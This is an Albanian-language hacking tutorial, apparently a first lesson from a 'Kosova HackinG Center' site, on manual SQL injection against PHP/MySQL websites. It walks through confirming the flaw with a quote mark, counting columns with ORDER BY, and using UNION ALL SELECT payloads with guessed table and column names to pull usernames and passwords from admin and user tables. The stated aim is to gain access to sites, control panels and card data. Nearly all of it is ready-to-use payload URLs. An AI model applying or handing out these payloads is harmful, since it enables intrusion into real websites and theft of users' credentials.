Së Pari cka është SQL-injetion?
-SQL-injetion është pra një ndër metodat më të perdorura ditët e sodit
për të marr akses në ndonjë webfaqe. Kjo i jep leje sulmuesit që të
sulmon përmes URL-së, që të merr informata të ndryshme, si aksese në
MYSQL, faqen e administrimit(CPanel), CC, dhe info tjera të ndryshme.!
1). Provo se a është faqja vulnerability !!
Të themi se kemi dicka të till:
http://www.site.com/vesti.php?id=1
Tashti që të testojm se a është vulnerability, apo thjesht a ka buggs
shkojm dhe ja shtojm ' (pra presjen lart). dhe kjo do të duket kështu:
http://www.site.com/vesti.php?id=1'
Pra pas kësaj nëse na jepë ndonjë error si psh.
"You have an error in your SQL syntax;" ose "Warning: mysql_result() [function.mysql-result]:"
Atëhere ne menjëher me këtë nënkuptojmë se faqja është vulnerability për SQL-injetion, pra ka buggs!
2). Si të gjejmë se sa numra të kolumnave ka SQL-ja në ndonji x faqe! (Numbers of Columns).
Për të gjetur sa sa Columna kemi përdorim: ORDER BY
Pra "order by" pa presje do të na ndihmon të gjejmë se sa kolumna kemi shkojm me shembull:
http://www.site.com/vesti.php?id=1 order by 1-- <-- Hapet faqja normal pra nuk na jep Error
http://www.site.com/vesti.php?id=1 order by 2-- <-- Hapet faqja normal pra nuk na jep Error
http://www.site.com/vesti.php?id=1 order by 3-- <-- Hapet faqja normal pra nuk na jep Error
http://www.site.com/vesti.php?id=1 order by 4-- <-- Hapet faqja normal pra nuk na jep Error
http://www.site.com/vesti.php?id=1 order by 5-- <-- Error Pra këtu kemi error!
-Me këtë nënkuptojm se tek kjo faqe kemi 4 Kolumna pra e merrni numrin e fundit e cila nuk jep error!
3). Provo për UNION funksionin!
Pra tashti do të provojmë që të nxjerim numrat e kolumnave dhe info-t tjera në dritare të pc-së, përmes "Union all select".
Pra kemi:
http://www.site.com/vesti.php?id=1 union all select 1,2,3,4--
Nëse tek dritarja na shfaqen ndonjeri prej numrave prej 1-4 atëherë
mirë është dhe funksionon krejt në rregull por në qoft se jo atëhere
provoni të ja shtoni nji - (minus) perpara tek "1" i parë pra numrat
munden të ndryshojnë mundet të jetë 50,71,82 etj shembull:
ë http://www.site.com/vesti.php?id=-50 union all select 1,2,3,4--
ose
http://www.site.com/vesti.php?id=-71 union all select 1,2,3,4--
ose
http://www.site.com/vesti.php?id=-82 union all select 1,2,3,4--
Tashti duhet të na shfaqet ndonjëri prej 4 numrave pra prej 1-4 nëse
shfaqet ndonjeri prej këtyre at here gjithcka është në rregull dhe
vazhdojmë !!?
4). Si të gjejm Table_name dhe Column_name
-Pra kjo është një pjesë e rëndësishme e SQl-së.
Per te gjetur table_name provojmë: user/s, admin/s, member/s, login/s etj..
Kto janë në shumicen e faqeve table_name!! ka edhe tjera table_name si psh për joomla: jos_users, per mambo: mos_users etj.
Te themi që table_name është "users" dhe më pas shkojmë kështu:
http://www.site.com/vesti.php?id=-71 union all select 1,2,3,4 from users--
Për të gjetur Column_name provojmë:
username, user_name, login, user_n etj..
Për password column_name provojmë:
password, pass, pwd, passwd etj.
Të themi që column_name janë username dhe pwd !! shkojmë të shohim si do të duket me shembull:
Final:
http://www.site.com/vesti.php?id=-71 union all select 1,username,3,pwd from users--
Ose nëse doni ti bashkoni column_names me një numër atëhere veprojmë me "concat(column_name,char(58),column_name)" shembull:
http://www.site.com/vesti.php?id=-71 union all select 1,2,3,concat(username,char(58),pwd) from users--
Pra numrat të cilët i shohim në dritare i zëvendësojmë me column_name si në rastin ton username dhe pwd.
Dhe më në fund dalin username dhe passwordi shembull:!!!
username: boom3rang
password: SQL-injetion
Më këtë mbarron mësimi i pare për SQL-injetion në gjuhën shqipe!!
Kosova HackinG Center
Www.ScR1mBa.yolasite.com
